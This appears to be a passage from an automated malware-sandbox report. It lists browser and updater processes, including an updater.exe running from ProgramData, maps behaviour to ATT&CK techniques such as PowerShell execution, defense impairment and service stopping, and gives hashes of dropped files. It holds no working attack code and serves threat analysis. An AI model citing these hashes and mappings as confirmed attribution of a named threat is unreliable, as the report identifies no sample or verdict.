  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1976,7468267694907106118,13739905465802379447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4064 /prefetch:1
  2⤵
  PID:5864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1976,7468267694907106118,13739905465802379447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:1
  2⤵
  PID:7728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1976,7468267694907106118,13739905465802379447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:1
  2⤵
  PID:8952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1976,7468267694907106118,13739905465802379447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1
  2⤵
  PID:8728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1976,7468267694907106118,13739905465802379447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
  2⤵
  PID:4832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1976,7468267694907106118,13739905465802379447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
  2⤵
  PID:836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1976,7468267694907106118,13739905465802379447,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:1
  2⤵
  PID:8756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1976,7468267694907106118,13739905465802379447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6368 /prefetch:1
  2⤵
  PID:7524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1976,7468267694907106118,13739905465802379447,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6460 /prefetch:1
  2⤵
  PID:4000
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1976,7468267694907106118,13739905465802379447,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6000 /prefetch:8
  2⤵
  PID:2836
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1976,7468267694907106118,13739905465802379447,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6000 /prefetch:8
  2⤵
  PID:8316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1976,7468267694907106118,13739905465802379447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4012 /prefetch:1
  2⤵
  PID:3620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaFoundationService --field-trial-handle=1976,7468267694907106118,13739905465802379447,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=6268 /prefetch:8
  2⤵
  PID:2988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1976,7468267694907106118,13739905465802379447,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5424 /prefetch:8
  2⤵
  PID:2232
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1976,7468267694907106118,13739905465802379447,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5372 /prefetch:8
  2⤵
  PID:7380

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6556

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6116

C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
1⤵
PID:6140

C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
1⤵
PID:7200

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4328

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
4b1b9a525f813b0b50fb768a91122eb0

SHA1
57a0788d952a0f50652f836ea7a687d3d6956b7f

SHA256
25c3fa80556d205f3e16606118b663d7a465dea6ec1f0e80d11146fa174a1617

SHA512
4973fd4728896dbdddff55f07ba80c038f0af11fc1e6e373272d291a079aea5dda09b17731d9a935c30544e65e2a9a92bcdcf457162e311399864bf185a2d0ba

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
ec1e2329a90ec79d1363cfa1525d5be2

SHA1
a13ac654e0697ecf0a403f03c416f7b63db325a6

SHA256
f91a2f3613e11cbda97fd4f229f1a9535996184db2a22331371e0535d2be25db

SHA512
b8258edc31cb353e007f9c57489c015efff9e8f61632633e125aafe351c5f7ebb54eb42c5701f15e85c118c075d34c6abfc699c04709768e3b3f7517b2f12c86

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001

Filesize
211KB

MD5
e7226392c938e4e604d2175eb9f43ca1

SHA1
2098293f39aa0bcdd62e718f9212d9062fa283ab

SHA256
d46ec08b6c29c4ca56cecbf73149cc66ebd902197590fe28cd65dad52a08c4e1

SHA512
63a4b99101c790d40a813db9e0d5fde21a64ccaf60a6009ead027920dbbdb52cc262af829e5c4140f3702a559c7ac46efa89622d76d45b4b49a9ce01625ef145

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000002

Filesize
24KB

MD5
c594a826934b9505d591d0f7a7df80b7

SHA1
c04b8637e686f71f3fc46a29a86346ba9b04ae18

SHA256
e664eef3d68ac6336a28be033165d4780e8a5ab28f0d90df1b148ef86babb610

SHA512
04a1dfdb8ee2f5fefa101d5e3ff36e87659fd774e96aa8c5941d3353ccc268a125822cf01533c74839e5f1c54725da9cc437d3d69b88e5bf3f99caccd4d75961

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
240B

MD5
0572dd142cc0d5f297938a76ba98e89c

SHA1
9cd0499015bd9814c612fe9e0c49d927f923841a

SHA256
046b8d372928e445bab554d1621309796a0c4ecd6e924494a42feee19bdde7ab

SHA512
2aaa0586ebd49c278bb93717c01b20db56ba78af08b7d496d7d08cfb15dd0b906381acb214c0c84ed86d7c25e5bff43b6f561a4ab591933f91941aa68b288859

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
216B

MD5
d73d1696b1c08defd99035a0191d785f

SHA1
7e4478307999ef9564a9d97da210dbce8be04680

SHA256
be77ccbcdaeac7782fb6a026022984a8ad14b275c104c62e252d4cb7c4eb2822

SHA512
2aa7e4967641ca09dceec88a6e5afa2a468f169faf6031ac9b52274920fc57722221e758498e284a401e05f9d51ba3b70ecc07e7b856783d653a3c48bc2f5eeb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
ae94923901048b9c3d7f06760aad9a5a

SHA1
c82b7536f6d336bdc6f71d87af4e3652ce48545f

SHA256
19431e25cdd9d71a0b54b450cef93e6e3235bb3bbdffec63041277ff86d349e4

SHA512
9206f9e52730a46b99f10a1bdd974c78e62cf53ec4e103ce32ebd1d4399cbae716596597a1a1c1b2a216ecadc3642ec44b780049628ae7f47bfc6791a9b47263

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
31072158ee317fd6f27db757ab789e77

SHA1
2b8ae89e021834430aeadf184db189a8a8526c1b

SHA256
4dea2b5db6fdf0df8a1fd1f5fd1f0af5d7d1f5e78779730461ad974fb655b6d8

SHA512
7e537d169a196f83d415766ccbfe7bf015657031bb716f27634924946fce2a0e4de00aeac5c1c12b6a36a070332c7c1be1005e25cd51143679002cc0ea5c68a4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
cd67cf5474d97138d1eadc6dc6896065

SHA1
df805dcbfc0c258726bbecbf31d59b4a24ee4cdb

SHA256
165c705fec7c815725b73212e90f5dea6e91e018a1b9493d1dcb4094c6e2c007

SHA512
b835355cfd364c7c60b7e533d4cdd282dda354b410a77ddd9ac89ab36c781e9e5537773cf639591ee983e824e47ee4c66bfa4fbe1fecf2b1e15723442aae939f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
3f7fc17dcfcc147f7daef3efb4a725da

SHA1
102d5515e301162b2bd3a5aaa5caf6b9e770684e

SHA256
d790e73c5884f5df5e8b20c945957f7590fb5fcc03a0b43042064c23159f96f1

SHA512
1fbd1cc7600ea96245af4730a950927b9d52f07feb1ddc83dc7d3af80d0d96da3ebe7c836fb02cab9f05d8c13f67a05769b42ccf15c4d10985e3498dffa44737

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
1ffb1eca8fc1b949a62f08dcd2b5cfb7

SHA1
10d054d96636270b918af35c6055df5da199c899

SHA256
7af7cfb657d50401e0282ea92ad6ffdee82555302ca0fc136a6ba13a40a63bd1

SHA512
d854d458bf76c6854707703b55b63630ea8c9c48fb14ec9521b8e30eae056bca67eb8bd0dc2c39fba5647ef1faca52eff59ce940f59fbd1f5bb7d185e4a2ab8a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
e9347030069c97bf529e6275f7b7572c

SHA1
a7708bd36cfc90142ccbf23dbfb675fd5acf8020

SHA256
08156f9b8fb4e945793f44724c1fb8264f8988ed7de2044caeeb35a7a87fd703

SHA512
e144e76aab92823679a13ff8797bd40f9bd050b75c852e78d37b5a0cd856e436343263df4225acea97a2fc4efc9c06070ec39e3833b5b8e066de7fe1d2e78bc5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
09654811deb93547429e7d96569adcd4

SHA1
9cdce87f1f3a4656aa7cb4ae39f373fac50c8936

SHA256
a1c99894e87065a939e5d5193d66052c167a708fca23f3b9c50e4a9ef049ebd0

SHA512
f06772614838825ce942667b852f708f15c16e17ce552cb39dc1a538b9673b9b43e4ad051338623c5b25ca00b3e0a68752db236871d02cdddc78706e820971e4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
ac702cbe172606c5651a9c5718c02d8c

SHA1
94c6446eda40a080ca10a3563de9c3aeb4df8b1e

SHA256
f0c64fe1e92b407e9965e93ab182b7d176833fb007d30f28a605bb49bec2d0cf

SHA512
d1ad78242948e3dfe4842eccb89b24fa4a0ba7e0a10b88986a2d2c8f51d20fc4b402e6823cdf9f4fc128e62f130a060c312ff1239f44af238a55a67b51268b6f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
60177468e967cd050494084698254644

SHA1
dd5afd05aec8ded035cd3377b6131b30fc026292

SHA256
060483635f04be64ffdeaa74ecb4ddab5bed87efe678e14393a71d219c33a4ec

SHA512
d14d07d51edfac711a85d09e393d5ce30c59b46f3b48c3f930a7b545683018be0469c8548b70d6eaeb815d8a317b4ad22644543cbb7f4463a01f8a8cd4faaaed

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
bcf65c327bb0b5b161fc349a3ed80bcf

SHA1
3d5504f8606f9dc7ac72e47b23d3fbf5c38c8703

SHA256
8eed5de3f05b5025eabbacaa8df5597a3d812a086c03819c83b68ecd52f56621

SHA512
dd538455ee78f0a9e2283f32fab010c02f01518ce6c7ca834d2cd8a8f4d4269818e533ca9954a644533bbbf84c66c0d07944837c96fcc79be079038fc826ac68

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
bf7c2aad8a1907e26101b55961586b04

SHA1
42ba48b435827117e45bf2f64d7571bd80a4f6d8

SHA256
b8cd126d9cb5a58ed0cd29fd0a42f2e7a8adfbe69c934272b712315ab1da8f6a

SHA512
9a7db474aca42a47c4cfd413a2012ba15170d1a1336e844db7f06d598b98063c7233750853f03ee82e08e8f727372c7e926dbf52ffee0b88e7f49b6cfaceb624

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
c3431707f7fb2629d80d11d4b38f5c61

SHA1
f26318b557492a6c667238b782adeb81f7a327a9

SHA256
718aaade682d80496c0bb0ebd88a4857f32ddd7789b705cb696c6aecde026013

SHA512
50d7240d78dbf354480696c43baaae4951b5e6e4560069c8b96ff3c18594eac7cecbe7a4461013b1643be521d8e8b9f69cbad4edb241870cc8effcc3e9cff9c4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
76d4c8b837efa2940965701e34f39d91

SHA1
d38cb98ea148184d517194e6d471232dedfd669c

SHA256
125b35f0a9ca9713612f2cc0062d4b32b32f8344aba92c4b524de72214bec870

SHA512
fe59a619c73c98577e82f1b6c3cb989bf911b22dbf87fc493811f82ef056c079c7d97807d231b6d7eafceeb36ac220442c59bdf1fe3ebe25d158c58e9abc00d8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
01793e92a3a68c6947b9ebc29bf518eb

SHA1
33d94f6e2283d391b9e67fda328d5be0eaf5dcd3

SHA256
bb424c2a85a5ebde57cf28b5bbc488728609df8133118776ac0320725e318621

SHA512
a9756212bd135724e6f47b067cde650f78ee106bd6aece57909fafced18b925460fc0205febe48bf80cb2c34e57e26e4f708fc5fdc7659226b340e6879640a84

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
1455438312e25077434b9d7357e9a29a

SHA1
c3d70a6bcbc0b9ee545767898f2db0af6735feb2

SHA256
f5a519c6caf3fe98b8fc525824b49740a59f1530928f57f14b55f17fff720e1e

SHA512
632da275866c542ea22bdd8ec848fd1de56deb57bcc2d4e47680671551dedba917d85dd28664aea5e148d016cb587dd6f65777c141fbd44926388ca13dbbf079

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
e2a493fc6e1f3a450c7f178c13bd34ee

SHA1
862162aa4ce6cf96219d08e52449d5753dc6a9e2

SHA256
df9269772da2a1bd80bdfb293361c83fac0e7ba697d19bfecd29862e4c190e34

SHA512
b75c93ac2343a2f745f18f169087b6595cf28a703ce4416d12d579d468884db02ea523d3fc0e7e9215dd01572258b8a91b918ceae2b7be0fddc23d697a08559c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
205KB

MD5
4055f8a71a615ca1b38bfd1e894a81cd

SHA1
a79ec1ae19216262b138e2a692788dc18fcc7528

SHA256
3e6dd0b0f1ce8a75ac8fc888a9bf726c78212308690545e099a3279a5e1fa76d

SHA512
2ae10364d68d1d5ede792f03e4abd2644e0e03be284effd0393c2dc2209950e248cca0b7db5965311dc79646ad012e25138133ee9a80531388b81036f2a9e411

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
205KB

MD5
e52cd4bcebf5490d62e851a1158e6d65

SHA1
1135f1944d3d785874b5bfa16f68c5fb44e0a6e2

SHA256
ceacb335c32e0ad450a6061fc542a0be54068a09a3ec4f8e9360ec41595b9038

SHA512
c8900997890b86e29e3041f72d68c359dccf940cad212811e85b26e98aa3e3cb5338406349a84a31af0dd5ac7ac99c87d814bd0005e7c88b23869857d615d80d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
99KB

MD5
0194e50a187afd3f1292b8b92b119d55

SHA1
70fdf1a9583fac096eb5fcfca5e890437d659f10

SHA256
25781953176e09a7702f0636b3b7da8c4d26434bfb96137f5e2630d4d37a043b

SHA512
18f0c734d113cbac16bd62c59f448172fac8f99e2ae9c99810b92d0b35953f7f4fe3853f887cf8f0dc335416cbcdc9cb743eb32c5cbd3422117e9ec6b24c04a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
2457cba7a489938013bbba47274a3781

SHA1
f7aa44ddc6bdf4e99ee89f978d383d274b732888

SHA256
0f2d8894d41e4c173e6f5ab7ef25952a51a153e30b05c8f5f22930e6c532c982

SHA512
dd8c65975f2fdf0dc6c41ea36fcf9eb95cb4a66aec2f999f35f6f5e3d9f1d4dce28d576d16c0b6ff1d4102eb869e061835e7ddc7e8bff3c50c880aea71011578

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b9569e123772ae290f9bac07e0d31748

SHA1
5806ed9b301d4178a959b26d7b7ccf2c0abc6741

SHA256
20ab88e23fb88186b82047cd0d6dc3cfa23422e4fd2b8f3c8437546a2a842c2b

SHA512
cfad8ce716ac815b37e8cc0e30141bfb3ca7f0d4ef101289bddcf6ed3c579bc34d369f2ec2f2dab98707843015633988eb97f1e911728031dd897750b8587795

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
eeaa8087eba2f63f31e599f6a7b46ef4

SHA1
f639519deee0766a39cfe258d2ac48e3a9d5ac03

SHA256
50fe80c9435f601c30517d10f6a8a0ca6ff8ca2add7584df377371b5a5dbe2d9

SHA512
eaabfad92c84f422267615c55a863af12823c5e791bdcb30cabe17f72025e07df7383cf6cf0f08e28aa18a31c2aac5985cf5281a403e22fbcc1fb5e61c49fc3c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\8af2e3b8-2f6a-492d-923c-ffa3ebbc634b.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

Filesize
19KB

MD5
76a3f1e9a452564e0f8dce6c0ee111e8

SHA1
11c3d925cbc1a52d53584fd8606f8f713aa59114

SHA256
381396157ed5e8021dd8e660142b35eb71a63aecd33062a1103ce9c709c7632c

SHA512
a1156a907649d6f2c3f7256405d9d5c62a626b8d4cd717fa2f29d2fbe91092a2b3fdd0716f8f31e59708fe12274bc2dea6c9ae6a413ea290e70ddf921fe7f274

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

Filesize
67KB

MD5
ed124bdf39bbd5902bd2529a0a4114ea

SHA1
b7dd9d364099ccd4e09fd45f4180d38df6590524

SHA256
48232550940208c572ebe487aa64ddee26e304ba3e310407e1fc31a5c9deed44

SHA512
c4d180292afa484ef9556d15db1d3850416a85ad581f6f4d5eb66654991fa90f414029b4ce13ed142271a585b46b3e53701735ee3e0f45a78b67baa9122ba532

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
62KB

MD5
c3c0eb5e044497577bec91b5970f6d30

SHA1
d833f81cf21f68d43ba64a6c28892945adc317a6

SHA256
eb48be34490ec9c4f9402b882166cd82cd317b51b2a49aae75cdf9ee035035eb

SHA512
83d3545a4ed9eed2d25f98c4c9f100ae0ac5e4bc8828dccadee38553b7633bb63222132df8ec09d32eb37d960accb76e7aab5719fc08cc0a4ef07b053f30cf38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

Filesize
41KB

MD5
f3d0a156d6ecb39d1805d60a28c8501d

SHA1
d26dd641e0b9d7c52b19bc9e89b53b291fb1915c

SHA256
e8be4436fcedf9737ea35d21ec0dcc36c30a1f41e02b3d40aa0bfa2be223a4a3

SHA512
076acfd19e4a43538f347ab460aa0b340a2b60d33f8be5f9b0ef939ef4e9f365277c4ff886d62b7edb20a299aacf50976321f9f90baba8ccd97bc5ac24a580bc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

Filesize
65KB

MD5
56d57bc655526551f217536f19195495

SHA1
28b430886d1220855a805d78dc5d6414aeee6995

SHA256
f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4

SHA512
7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

Filesize
88KB

MD5
b38fbbd0b5c8e8b4452b33d6f85df7dc

SHA1
386ba241790252df01a6a028b3238de2f995a559

SHA256
b18b9eb934a5b3b81b16c66ec3ec8e8fecdb3d43550ce050eb2523aabc08b9cd

SHA512
546ca9fb302bf28e3a178e798dd6b80c91cba71d0467257b8ed42e4f845aa6ecb858f718aac1e0865b791d4ecf41f1239081847c75c6fb3e9afd242d3704ad16

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008

Filesize
1.2MB

MD5
540af416cc54fd550dcdd8d00b632572

SHA1
644a9d1dfcf928c1e4ed007cd50c2f480a8b7528

SHA256
e4e53d750c57e4d92ab9de185bb37f5d2cc5c4fcc6a2be97386af78082115cbb

SHA512
7692e046e49fcde9c29c7d6ea06ed4f16216ec9fb7ea621d3cc4493364743c03925e74244785588d1a4bfc2bedd32b41e7e66e244990d4076e781d7f4bbb270f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
45d424db9cd3a3ea7fc6952b814d6aa5

SHA1
537439b0fec185b6e8951ec4f6f044781ed553c7

SHA256
07ca9b98a810617f63665d3485f4d25cffa5a44bf3dd6e690ee18eec894bd817

SHA512
485c6ea73144d550c24fc30c494987531b4de319f6b683570c97d4c90c652d4c555e39da0012b958cd3a1f9f3f268607d0dfbb1512c94b63e1bcb2e86f4c6654

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
807419ca9a4734feaf8d8563a003b048

SHA1
a723c7d60a65886ffa068711f1e900ccc85922a6

SHA256
aa10bf07b0d265bed28f2a475f3564d8ddb5e4d4ffee0ab6f3a0cc564907b631

SHA512
f10d496ae75db5ba412bd9f17bf0c7da7632db92a3fabf7f24071e40f5759c6a875ad8f3a72bad149da58b3da3b816077df125d0d9f3544adba68c66353d206c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
976B

MD5
eb9f6229e28915d181c7e6cdc3dde10b

SHA1
2255a6ba123b78d6def1e3b220592833b3881b68

SHA256
a9aa97935ddd287b60a957b69eaa4c714ed1fe952b290f79ae15cbd8587d32b9

SHA512
69c094c12f53abd6cbdb60f08b60bf9b369e5c99a2f6c19dcffa3d3b72e8c081db1c763e496e73823e56ab96f98b59010fdefb92c291bf5e48d6e28a4998f376

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
61B

MD5
4df4574bfbb7e0b0bc56c2c9b12b6c47

SHA1
81efcbd3e3da8221444a21f45305af6fa4b71907

SHA256
e1b77550222c2451772c958e44026abe518a2c8766862f331765788ddd196377

SHA512
78b14f60f2d80400fe50360cf303a961685396b7697775d078825a29b717081442d357c2039ad0984d4b622976b0314ede8f478cde320daec118da546cb0682a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
d35a2179bc19d6a133a6a45f44392801

SHA1
994029c3c1e57472f1aca66711fe75c7840e9d92

SHA256
ee5032d1b17d3acc107c1e3303597776e82f5b3f320e502db7e1cbf8f5217f04

SHA512
267dbc0a74c882ed8991da23a961a769068234cbf172b932272a27ba00c0b5299eb367ce3d01136b0736c61fbf527e2bfb4c79b93e2b8ab3f9c0ff8fc8db535f

Download Submit
